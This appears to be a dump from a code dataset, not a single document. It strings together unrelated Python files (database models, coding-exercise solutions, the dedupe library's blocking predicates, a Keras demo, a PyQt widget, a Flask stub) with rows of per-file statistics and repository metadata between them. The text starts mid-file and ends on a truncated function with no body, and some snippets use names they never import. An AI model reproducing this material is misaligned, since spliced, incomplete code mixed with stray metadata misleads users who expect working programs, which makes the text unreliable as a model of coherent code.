__tablename__ = 'ratings'
product_id = db.Column(db.String(255), primary_key=True)
order_id = db.Column(db.String(255), primary_key=True)
rating = db.Column(db.Integer)
class User(db.Model):
__tablename__ = 'users'
user_id = db.Column(db.Integer, autoincrement=True)
mobile = db.Column(db.String(10), primary_key=True)
email = db.Column(db.String(100))
name = db.Column(db.String(100))
class City(db.Model):
__tablename__ = 'cities'
city_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
name = db.Column(db.String(100))
class Hub(db.Model):
__tablename__ = 'hubs'
hub_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
name = db.Column(db.String(100))
    city_id = db.Column(db.Integer, db.ForeignKey('cities.city_id'))
latitude = db.Column(db.Float)
longitude = db.Column(db.Float)
class Order(db.Model):
__tablename__ = 'orders'
order_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
    hub_id = db.Column(db.Integer, db.ForeignKey('hubs.hub_id'))
    user_id = db.Column(db.Integer, db.ForeignKey('users.user_id'))
class OrderItem(db.Model):
__tablename__ = 'order_items'
    order_id = db.Column(db.Integer, db.ForeignKey('orders.order_id'), primary_key=True)
    product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'), primary_key=True)
rent_from = db.Column(db.DateTime)
rent_to = db.Column(db.DateTime)
class Product(db.Model):
__tablename__ = 'products'
product_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
name = db.Column(db.String(100))
    description = db.Column(db.Text)
class ProductMerchandising(db.Model):
__tablename__ = 'product_merchandising'
    product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'), primary_key=True)
    hub_id = db.Column(db.Integer, db.ForeignKey('hubs.hub_id'), primary_key=True)
price = db.Column(db.Float)
color = db.Column(db.String)
cost_of_assemble = db.Column(db.Float)
time_to_assemble = db.Column(db.Integer)
# ===== uri/iniciante/1040.py | AllefLobo/AlgorithmsProblemsSolution | MIT =====
n1, n2, n3, n4 = map( float, raw_input().split() )
media = (n1*2 + n2*3 + n3*4 + n4*1)/10.0
print "Media: %.1f" %(media)
if media < 5.0 :
print "Aluno reprovado."
elif media >= 5.0 and media <= 6.9:
print "Aluno em exame."
exame = float(input())
print "Nota do exame: %.1f" %(exame)
media = (media + exame) / 2.0
if media >= 5.0:
print "Aluno aprovado."
else:
print "Aluno reprovado."
print "Media final: %.1f" %(media)
else:
print "Aluno aprovado."
| 24.047619 | 50 | 0.558416 | 77 | 505 | 3.649351 | 0.428571 | 0.177936 | 0.074733 | 0.064057 | 0.135231 | 0.135231 | 0 | 0 | 0 | 0 | 0 | 0.075269 | 0.263366 | 505 | 20 | 51 | 25.25 | 0.680108 | 0 | 0 | 0.352941 | 0 | 0 | 0.246032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.470588 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
# ===== baselines/gps/algorithm/policy/policy.py | DengYuelin/baselines-assembly | MIT =====
""" This file defines the base class for the policy. """
import abc
class Policy(object):
""" Computes actions from states/observations. """
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def act(self, x, obs, t, noise):
"""
Args:
x: State vector.
obs: Observation vector.
t: Time step.
noise: A dU-dimensional noise vector.
Returns:
A dU dimensional action vector.
"""
raise NotImplementedError("Must be implemented in subclass.")
def set_meta_data(self, meta):
"""
Set meta data for policy (e.g., domain image, multi modal observation sizes)
Args:
meta: meta data.
"""
return
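Policy declares act as abstract so every concrete policy must implement it. A minimal Python 3 sketch of the same contract (the ZeroPolicy subclass is invented for illustration; the original file uses the Python 2 __metaclass__ spelling):

```python
import abc

class Policy(abc.ABC):
    @abc.abstractmethod
    def act(self, x, obs, t, noise):
        """Map state/observation (and noise) to an action."""

class ZeroPolicy(Policy):
    def act(self, x, obs, t, noise):
        # Trivial concrete policy: ignore inputs, return a zero action.
        return [0.0]

try:
    Policy()  # abstract classes cannot be instantiated
except TypeError as e:
    print('TypeError:', e)

print(ZeroPolicy().act(None, None, 0, None))  # [0.0]
```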
# ===== generated-libraries/python/netapp/nfs/sec_flavor_info.py | radekg/netapp-ontap-lib-get | MIT =====
from netapp.netapp_object import NetAppObject
class SecFlavorInfo(NetAppObject):
"""
Sec flavor info
"""
_flavor = None
@property
def flavor(self):
"""
Security_Flavor
Attributes: key, non-creatable, non-modifiable
"""
return self._flavor
@flavor.setter
def flavor(self, val):
        if val is not None:
self.validate('flavor', val)
self._flavor = val
@staticmethod
def get_api_name():
return "sec-flavor-info"
@staticmethod
def get_desired_attrs():
return [
'flavor',
]
def describe_properties(self):
return {
'flavor': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
# ===== Beginner/Chef and Interactive Contests (CHFINTRO)/interactive.py | anishsingh42/CodeChef | Apache-2.0 =====
N, r = map(int, input().split())
for i in range(N):
R = int(input())
if R>=r:
print('Good boi')
else:
        print('Bad boi')
# ===== bluebottle/segments/tests/factories.py | jayvdb/bluebottle | BSD-3-Clause =====
from builtins import object
import factory
from bluebottle.segments.models import Segment, SegmentType
class SegmentTypeFactory(factory.DjangoModelFactory):
class Meta(object):
model = SegmentType
name = factory.Faker('word')
is_active = True
class SegmentFactory(factory.DjangoModelFactory):
class Meta(object):
model = Segment
name = factory.Faker('word')
alternate_names = factory.List([
factory.Faker('word')
])
type = factory.SubFactory(SegmentTypeFactory)
# ===== apps/user/paginations.py | ahojcn/bvideo =====
from rest_framework.pagination import PageNumberPagination
class UserListPagination(PageNumberPagination):
"""
    Paginator for fetching the user list.
"""
page_size = 64
page_query_param = "page"
page_size_query_param = "size"
max_page_size = 64
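PageNumberPagination above slices a result set into fixed-size pages selected by the `page` and `size` query parameters, with the requested size capped at max_page_size. The underlying page arithmetic can be sketched without Django REST framework (the function and parameter names are invented):

```python
def paginate(items, page=1, size=64, max_size=64):
    # Clamp the client-requested size to the configured maximum.
    size = min(size, max_size)
    start = (page - 1) * size
    return items[start:start + size]

data = list(range(200))
print(len(paginate(data, page=1)))            # 64
print(paginate(data, page=2, size=10))        # [10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
print(len(paginate(data, page=1, size=500)))  # 64  (clamped to max_size)
```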
# ===== study_roadmaps/python_sample_examples/keras/7_switch_mode/eval_train_eval.py | Shreyashwaghe/monk_v1 | Apache-2.0 =====
import os
import sys
sys.path.append("../../../monk/");
import psutil
from keras_prototype import prototype
ktf = prototype(verbose=1);
ktf.Prototype("sample-project-1", "sample-experiment-1");
ktf.Default(dataset_path="../../../monk/system_check_tests/datasets/dataset_cats_dogs_train",
model_name="resnet50", freeze_base_network=True, num_epochs=2);
######################################## Switch To Eval Mode ########################################
ktf.Switch_Mode(eval_infer=True)
#####################################################################################################
##################################### Evaluate on eval dataset #####################################
ktf.Dataset_Params(dataset_path="../../../monk/system_check_tests/datasets/dataset_cats_dogs_eval");
ktf.Dataset();
accuracy, class_based_accuracy = ktf.Evaluate();
#####################################################################################################
######################################## Switch To Train Mode ########################################
ktf.Switch_Mode(train=True)
#####################################################################################################
##################################### Train ###########################################
ktf.update_dataset(dataset_path=["../../../monk/system_check_tests/datasets/dataset_cats_dogs_train",
"../../../monk/system_check_tests/datasets/dataset_cats_dogs_eval"]);
ktf.Dataset(); #Can also use ktf.Reload() here
ktf.Train();
#####################################################################################################
######################################## Switch To Eval Mode ########################################
ktf.Switch_Mode(eval_infer=True)
#####################################################################################################
##################################### Evaluate on eval dataset #####################################
ktf.Dataset_Params(dataset_path="../../../monk/system_check_tests/datasets/dataset_cats_dogs_eval");
ktf.Dataset();
accuracy, class_based_accuracy = ktf.Evaluate();
##################################################################################################### | 34.227273 | 102 | 0.389553 | 165 | 2,259 | 5.054545 | 0.315152 | 0.059952 | 0.089928 | 0.119904 | 0.651079 | 0.651079 | 0.651079 | 0.651079 | 0.651079 | 0.651079 | 0 | 0.002814 | 0.05622 | 2,259 | 66 | 103 | 34.227273 | 0.388368 | 0.065958 | 0 | 0.409091 | 0 | 0 | 0.36583 | 0.310811 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
816f8a4a6aea42cc16b1248d7d53e2fbd8c89bcd | 1,243 | py | Python | ui/QDoubleSpinBoxWithFocus.py | ionicsolutions/eframe | 9129312231505afbfca5a780b0003a30fac2ba12 | [
"Apache-2.0"
] | null | null | null | ui/QDoubleSpinBoxWithFocus.py | ionicsolutions/eframe | 9129312231505afbfca5a780b0003a30fac2ba12 | [
"Apache-2.0"
] | null | null | null | ui/QDoubleSpinBoxWithFocus.py | ionicsolutions/eframe | 9129312231505afbfca5a780b0003a30fac2ba12 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# (c) 2017 Kilian Kluge
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from PyQt4 import QtCore, QtGui
class QDoubleSpinBoxWithFocus(QtGui.QDoubleSpinBox):
"""Customized :class:`QtGui.QDoubleSpinBox` where the focus events
are mapped to signals."""
receivedFocus = QtCore.pyqtSignal()
lostFocus = QtCore.pyqtSignal()
def __init__(self, parent):
super(QDoubleSpinBoxWithFocus, self).__init__(parent)
def focusInEvent(self, event):
super(QDoubleSpinBoxWithFocus, self).focusInEvent(event)
self.receivedFocus.emit()
def focusOutEvent(self, event):
super(QDoubleSpinBoxWithFocus, self).focusOutEvent(event)
self.lostFocus.emit()
| 35.514286 | 76 | 0.718423 | 153 | 1,243 | 5.784314 | 0.607843 | 0.067797 | 0.108475 | 0.036158 | 0.092655 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00995 | 0.191472 | 1,243 | 34 | 77 | 36.558824 | 0.870647 | 0.541432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8193a14707d2bdc2ff231be68f34c63656ae5bb5 | 129 | py | Python | exercicios_python/Exercicio_049.py | GabsOrtega/logica-python | 6f4e752d0796c9bf70be8f7108bc3bd49d877709 | [
"MIT"
] | null | null | null | exercicios_python/Exercicio_049.py | GabsOrtega/logica-python | 6f4e752d0796c9bf70be8f7108bc3bd49d877709 | [
"MIT"
] | null | null | null | exercicios_python/Exercicio_049.py | GabsOrtega/logica-python | 6f4e752d0796c9bf70be8f7108bc3bd49d877709 | [
"MIT"
] | null | null | null | n = int(input('Digite o número que deseja a tabuada: '))
for c in range(1, 11):
print('{} X {} = {}'.format(n, c, n*c))
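A variant of the same exercise that builds the table lines instead of printing them directly, which makes the logic easy to reuse and check (`tabuada` is an illustrative helper name, not part of the original exercise):

```python
def tabuada(n, upto=10):
    """Return the multiplication table of n as formatted lines."""
    return ['{} X {} = {}'.format(n, c, n * c) for c in range(1, upto + 1)]

for line in tabuada(5):
    print(line)
```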
| 25.8 | 57 | 0.534884 | 23 | 129 | 3 | 0.826087 | 0.057971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030612 | 0.24031 | 129 | 4 | 58 | 32.25 | 0.673469 | 0 | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
819e23f88590870ab14787207e91087d23c607e9 | 14,835 | py | Python | dedupe/predicates.py | fritshermans/dedupe | fd7e8757e88d1b52d8965dda86b81482ebc2e516 | [
"MIT"
] | 2,190 | 2017-04-17T18:24:41.000Z | 2022-03-31T03:36:24.000Z | dedupe/predicates.py | fritshermans/dedupe | fd7e8757e88d1b52d8965dda86b81482ebc2e516 | [
"MIT"
] | 433 | 2017-04-17T22:46:45.000Z | 2022-03-29T04:08:40.000Z | dedupe/predicates.py | fritshermans/dedupe | fd7e8757e88d1b52d8965dda86b81482ebc2e516 | [
"MIT"
] | 345 | 2017-04-21T09:11:50.000Z | 2022-03-31T11:12:51.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import math
import itertools
import string
import abc
from doublemetaphone import doublemetaphone
from dedupe.cpredicates import ngrams, initials
import dedupe.tfidf as tfidf
import dedupe.levenshtein as levenshtein
from typing import Sequence, Callable, Any, Tuple, Set
from dedupe._typing import RecordDict
words = re.compile(r"[\w']+").findall
integers = re.compile(r"\d+").findall
start_word = re.compile(r"^([\w']+)").match
two_start_words = re.compile(r"^([\w']+\s+[\w']+)").match
start_integer = re.compile(r"^(\d+)").match
alpha_numeric = re.compile(r"(?=\w*\d)[a-zA-Z\d]+").findall
PUNCTABLE = str.maketrans("", "", string.punctuation)
def strip_punc(s):
return s.translate(PUNCTABLE)
class Predicate(abc.ABC):
def __iter__(self):
yield self
def __repr__(self):
return "%s: %s" % (self.type, self.__name__)
def __hash__(self):
try:
return self._cached_hash
except AttributeError:
h = self._cached_hash = hash(repr(self))
return h
def __eq__(self, other):
return repr(self) == repr(other)
def __len__(self):
return 1
@abc.abstractmethod
def __call__(self, record, **kwargs) -> tuple:
pass
def __add__(self, other: 'Predicate') -> 'CompoundPredicate':
if isinstance(other, CompoundPredicate):
return CompoundPredicate((self,) + tuple(other))
elif isinstance(other, Predicate):
return CompoundPredicate((self, other))
else:
raise ValueError('Can only combine predicates')
class SimplePredicate(Predicate):
type = "SimplePredicate"
def __init__(self, func: Callable[[Any], Tuple[str, ...]], field: str):
self.func = func
self.__name__ = "(%s, %s)" % (func.__name__, field)
self.field = field
def __call__(self, record: RecordDict, **kwargs) -> Tuple[str, ...]:
column = record[self.field]
if column:
return self.func(column)
else:
return ()
class StringPredicate(SimplePredicate):
def __call__(self, record: RecordDict, **kwargs):
column = record[self.field]
if column:
return self.func(" ".join(strip_punc(column).split()))
else:
return ()
class ExistsPredicate(Predicate):
type = "ExistsPredicate"
def __init__(self, field):
self.__name__ = "(Exists, %s)" % (field,)
self.field = field
@staticmethod
def func(column):
if column:
return ('1',)
else:
return ('0',)
def __call__(self, record, **kwargs):
column = record[self.field]
return self.func(column)
class IndexPredicate(Predicate):
def __init__(self, threshold, field):
self.__name__ = '(%s, %s)' % (threshold, field)
self.field = field
self.threshold = threshold
self.index = None
def __getstate__(self):
odict = self.__dict__.copy()
odict['index'] = None
return odict
def __setstate__(self, d):
self.__dict__.update(d)
# backwards compatibility
if not hasattr(self, 'index'):
self.index = None
def reset(self):
...
def bust_cache(self):
self._cache = {}
class CanopyPredicate(object):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.canopy = {}
self._cache = {}
def freeze(self, records):
self._cache = {record[self.field]: self(record) for record in records}
self.canopy = {}
self.index = None
def reset(self):
self._cache = {}
self.canopy = {}
self.index = None
def __call__(self, record, **kwargs):
block_key = None
column = record[self.field]
if column:
if column in self._cache:
return self._cache[column]
doc = self.preprocess(column)
try:
doc_id = self.index._doc_to_id[doc]
except AttributeError:
raise AttributeError("Attempting to block with an index "
"predicate without indexing records")
if doc_id in self.canopy:
block_key = self.canopy[doc_id]
else:
canopy_members = self.index.search(doc,
self.threshold)
for member in canopy_members:
if member not in self.canopy:
self.canopy[member] = doc_id
if canopy_members:
block_key = doc_id
self.canopy[doc_id] = doc_id
else:
self.canopy[doc_id] = None
if block_key is None:
return []
else:
return [str(block_key)]
class SearchPredicate(object):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cache = {}
def freeze(self, records_1, records_2):
self._cache = {(record[self.field], False): self(record, False)
for record in records_1}
self._cache.update({(record[self.field], True): self(record, True)
for record in records_2})
self.index = None
def reset(self):
self._cache = {}
self.index = None
def __call__(self, record, target=False, **kwargs):
column = record[self.field]
if column:
if (column, target) in self._cache:
return self._cache[(column, target)]
else:
doc = self.preprocess(column)
try:
if target:
centers = [self.index._doc_to_id[doc]]
else:
centers = self.index.search(doc, self.threshold)
except AttributeError:
raise AttributeError("Attempting to block with an index "
"predicate without indexing records")
result = [str(center) for center in centers]
self._cache[(column, target)] = result
return result
else:
return ()
class TfidfPredicate(IndexPredicate):
def initIndex(self):
self.reset()
return tfidf.TfIdfIndex()
class TfidfCanopyPredicate(CanopyPredicate, TfidfPredicate):
pass
class TfidfSearchPredicate(SearchPredicate, TfidfPredicate):
pass
class TfidfTextPredicate(object):
def preprocess(self, doc):
return tuple(words(doc))
class TfidfSetPredicate(object):
def preprocess(self, doc):
return doc
class TfidfNGramPredicate(object):
def preprocess(self, doc):
return tuple(sorted(ngrams(" ".join(strip_punc(doc).split()), 2)))
class TfidfTextSearchPredicate(TfidfTextPredicate,
TfidfSearchPredicate):
type = "TfidfTextSearchPredicate"
class TfidfSetSearchPredicate(TfidfSetPredicate,
TfidfSearchPredicate):
type = "TfidfSetSearchPredicate"
class TfidfNGramSearchPredicate(TfidfNGramPredicate,
TfidfSearchPredicate):
type = "TfidfNGramSearchPredicate"
class TfidfTextCanopyPredicate(TfidfTextPredicate,
TfidfCanopyPredicate):
type = "TfidfTextCanopyPredicate"
class TfidfSetCanopyPredicate(TfidfSetPredicate,
TfidfCanopyPredicate):
type = "TfidfSetCanopyPredicate"
class TfidfNGramCanopyPredicate(TfidfNGramPredicate,
TfidfCanopyPredicate):
type = "TfidfNGramCanopyPredicate"
class LevenshteinPredicate(IndexPredicate):
def initIndex(self):
self.reset()
return levenshtein.LevenshteinIndex()
def preprocess(self, doc):
return " ".join(strip_punc(doc).split())
class LevenshteinCanopyPredicate(CanopyPredicate, LevenshteinPredicate):
type = "LevenshteinCanopyPredicate"
class LevenshteinSearchPredicate(SearchPredicate, LevenshteinPredicate):
type = "LevenshteinSearchPredicate"
class CompoundPredicate(tuple, Predicate):
type = "CompoundPredicate"
def __hash__(self):
try:
return self._cached_hash
except AttributeError:
h = self._cached_hash = hash(frozenset(self))
return h
def __eq__(self, other):
return frozenset(self) == frozenset(other)
def __call__(self, record, **kwargs):
predicate_keys = [predicate(record, **kwargs)
for predicate in self]
return [
u':'.join(
# must escape : to avoid confusion with : join separator
b.replace(u':', u'\\:') for b in block_key
)
for block_key
in itertools.product(*predicate_keys)
]
def __add__(self, other: Predicate) -> 'CompoundPredicate': # type: ignore
if isinstance(other, CompoundPredicate):
return CompoundPredicate(tuple(self) + tuple(other))
elif isinstance(other, Predicate):
return CompoundPredicate(tuple(self) + (other,))
else:
raise ValueError('Can only combine predicates')
def wholeFieldPredicate(field: Any) -> Tuple[str]:
"""return the whole field"""
return (str(field), )
def tokenFieldPredicate(field):
"""returns the tokens"""
return set(words(field))
def firstTokenPredicate(field: str) -> Sequence[str]:
first_token = start_word(field)
if first_token:
return first_token.groups()
else:
return ()
def firstTwoTokensPredicate(field: str) -> Sequence[str]:
first_two_tokens = two_start_words(field)
if first_two_tokens:
return first_two_tokens.groups()
else:
return ()
def commonIntegerPredicate(field: str) -> Set[str]:
"""return any integers"""
return {str(int(i)) for i in integers(field)}
def alphaNumericPredicate(field: str) -> Set[str]:
return set(alpha_numeric(field))
def nearIntegersPredicate(field: str) -> Set[str]:
"""return any integers N, N+1, and N-1"""
ints = integers(field)
near_ints = set()
for char in ints:
num = int(char)
near_ints.add(str(num - 1))
near_ints.add(str(num))
near_ints.add(str(num + 1))
return near_ints
def hundredIntegerPredicate(field: str) -> Set[str]:
return {str(int(i))[:-2] + '00' for i in integers(field)}
def hundredIntegersOddPredicate(field: str) -> Set[str]:
return {str(int(i))[:-2] + '0' + str(int(i) % 2) for i in integers(field)}
def firstIntegerPredicate(field: str) -> Sequence[str]:
first_token = start_integer(field)
if first_token:
return first_token.groups()
else:
return ()
def ngramsTokens(field: Sequence[Any], n: int) -> Set[str]:
grams = set()
n_tokens = len(field)
for i in range(n_tokens):
for j in range(i + n, min(n_tokens, i + n) + 1):
grams.add(' '.join(str(tok) for tok in field[i:j]))
return grams
def commonTwoTokens(field: str) -> Set[str]:
return ngramsTokens(field.split(), 2)
def commonThreeTokens(field: str) -> Set[str]:
return ngramsTokens(field.split(), 3)
def fingerprint(field: str) -> Tuple[str]:
return (u''.join(sorted(field.split())).strip(),)
def oneGramFingerprint(field: str) -> Tuple[str]:
return (u''.join(sorted(set(ngrams(field.replace(' ', ''), 1)))).strip(),)
def twoGramFingerprint(field: str) -> Tuple[str, ...]:
if len(field) > 1:
return (u''.join(sorted(gram.strip() for gram
in set(ngrams(field.replace(' ', ''), 2)))),)
else:
return ()
def commonFourGram(field: str) -> Set[str]:
"""return 4-grams"""
return set(ngrams(field.replace(' ', ''), 4))
def commonSixGram(field: str) -> Set[str]:
"""return 6-grams"""
return set(ngrams(field.replace(' ', ''), 6))
def sameThreeCharStartPredicate(field: str) -> Tuple[str]:
"""return first three characters"""
return initials(field.replace(' ', ''), 3)
def sameFiveCharStartPredicate(field: str) -> Tuple[str]:
"""return first five characters"""
return initials(field.replace(' ', ''), 5)
def sameSevenCharStartPredicate(field: str) -> Tuple[str]:
"""return first seven characters"""
return initials(field.replace(' ', ''), 7)
def suffixArray(field):
n = len(field) - 4
if n > 0:
for i in range(0, n):
yield field[i:]
def sortedAcronym(field: str) -> Tuple[str]:
return (''.join(sorted(each[0] for each in field.split())),)
def doubleMetaphone(field):
return {metaphone for metaphone in doublemetaphone(field) if metaphone}
def metaphoneToken(field):
return {metaphone_token for metaphone_token
in itertools.chain(*(doublemetaphone(token)
for token in set(field.split())))
if metaphone_token}
def wholeSetPredicate(field_set):
return (str(field_set),)
def commonSetElementPredicate(field_set):
"""return set as individual elements"""
return tuple([str(each) for each in field_set])
def commonTwoElementsPredicate(field):
sequence = sorted(field)
return ngramsTokens(sequence, 2)
def commonThreeElementsPredicate(field):
sequence = sorted(field)
return ngramsTokens(sequence, 3)
def lastSetElementPredicate(field_set):
return (str(max(field_set)), )
def firstSetElementPredicate(field_set):
return (str(min(field_set)), )
def magnitudeOfCardinality(field_set):
return orderOfMagnitude(len(field_set))
def latLongGridPredicate(field, digits=1):
"""
Given a lat / long pair, return the grid coordinates at the
nearest base value. e.g., (42.3, -5.4) returns a grid at 0.1
degree resolution of 0.1 degrees of latitude ~ 7km, so this is
effectively a 14km lat grid. This is imprecise for longitude,
since 1 degree of longitude is 0km at the poles, and up to 111km
at the equator. But it should be reasonably precise given some
prior logical block (e.g., country).
"""
if any(field):
return (str([round(dim, digits) for dim in field]),)
else:
return ()
def orderOfMagnitude(field):
if field > 0:
return (str(int(round(math.log10(field)))), )
else:
return ()
def roundTo1(field): # thanks http://stackoverflow.com/questions/3410976/how-to-round-a-number-to-significant-figures-in-python
abs_num = abs(field)
order = int(math.floor(math.log10(abs_num)))
rounded = round(abs_num, -order)
return (str(int(math.copysign(rounded, field))),)
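The colon-escaping join performed in `CompoundPredicate.__call__` can be sketched as a standalone snippet (a minimal illustration of the idea, not part of dedupe's API; `compound_keys` and the sample keys are hypothetical):

```python
import itertools

def compound_keys(predicate_keys):
    # Each component predicate yields a set of block keys; the compound
    # key is the cartesian product joined with ':'. Any ':' inside a key
    # is escaped so it cannot be confused with the join separator.
    return [
        ':'.join(k.replace(':', '\\:') for k in combo)
        for combo in itertools.product(*predicate_keys)
    ]

keys = compound_keys([('12:30', 'smith'), ('ny',)])
print(keys)  # ['12\\:30:ny', 'smith:ny']
```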
| 27.320442 | 128 | 0.605999 | 1,614 | 14,835 | 5.42689 | 0.193928 | 0.018267 | 0.011303 | 0.014385 | 0.350154 | 0.289987 | 0.206645 | 0.146592 | 0.11394 | 0.062336 | 0 | 0.006421 | 0.275632 | 14,835 | 542 | 129 | 27.370849 | 0.808673 | 0.0606 | 0 | 0.324022 | 0 | 0 | 0.043566 | 0.014161 | 0 | 0 | 0 | 0 | 0 | 1 | 0.201117 | false | 0.00838 | 0.030726 | 0.064246 | 0.53352 | 0.00838 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
81adeaf2be84207841c2e9a9efa4f432086af04a | 449 | py | Python | fdk_client/application/models/RequiredFields.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/application/models/RequiredFields.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/application/models/RequiredFields.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | """Application Models."""
from marshmallow import fields, Schema
from marshmallow.validate import OneOf
from ..enums import *
from ..models.BaseSchema import BaseSchema
from .PlatformEmail import PlatformEmail
from .PlatformMobile import PlatformMobile
class RequiredFields(BaseSchema):
# User swagger.json
email = fields.Nested(PlatformEmail, required=False)
mobile = fields.Nested(PlatformMobile, required=False)
| 20.409091 | 58 | 0.759465 | 46 | 449 | 7.413043 | 0.5 | 0.087977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164811 | 449 | 21 | 59 | 21.380952 | 0.909333 | 0.084633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
81b9f2a479158049625581a3437a704893cdd0d3 | 462 | py | Python | example_snippets/multimenus_snippets/Snippets/Python/Regular expressions/Substitution with backreferences.py | kuanpern/jupyterlab-snippets-multimenus | 477f51cfdbad7409eab45abe53cf774cd70f380c | [
"BSD-3-Clause"
] | null | null | null | example_snippets/multimenus_snippets/Snippets/Python/Regular expressions/Substitution with backreferences.py | kuanpern/jupyterlab-snippets-multimenus | 477f51cfdbad7409eab45abe53cf774cd70f380c | [
"BSD-3-Clause"
] | null | null | null | example_snippets/multimenus_snippets/Snippets/Python/Regular expressions/Substitution with backreferences.py | kuanpern/jupyterlab-snippets-multimenus | 477f51cfdbad7409eab45abe53cf774cd70f380c | [
"BSD-3-Clause"
] | 1 | 2021-02-04T04:51:48.000Z | 2021-02-04T04:51:48.000Z | string = "John Doe lives at 221B Baker Street."
pattern = re.compile(r"""
([a-zA-Z ]+) # Save as many letters and spaces as possible to group 1
\ lives\ at\ # Match " lives at "
(?P<address>.*) # Save everything in between as a group named `address`
\. # Match the period at the end
""", re.VERBOSE)
new_string = re.sub(pattern, r"\g<address> is occupied by \1.", string)
print("New string is '{0}'".format(new_string)) | 51.333333 | 78 | 0.614719 | 71 | 462 | 3.971831 | 0.633803 | 0.074468 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017094 | 0.24026 | 462 | 9 | 79 | 51.333333 | 0.786325 | 0 | 0 | 0 | 0 | 0 | 0.730022 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
81c4fb7bbe69bd100140a23c7b95e8224c804d6e | 300 | py | Python | hello.py | mmastin/twitoff_DS9 | 4381726b07f1058e19083f6c61959722a1ecc578 | [
"MIT"
] | null | null | null | hello.py | mmastin/twitoff_DS9 | 4381726b07f1058e19083f6c61959722a1ecc578 | [
"MIT"
] | null | null | null | hello.py | mmastin/twitoff_DS9 | 4381726b07f1058e19083f6c61959722a1ecc578 | [
"MIT"
] | null | null | null | from flask import Flask
app = Flask(__name__)
# make the route
@app.route('/')
# now define a function
def hello():
return render_template('home.html')
# make a second route
@app.route('/about')
# now make a function that goes with about
def preds():
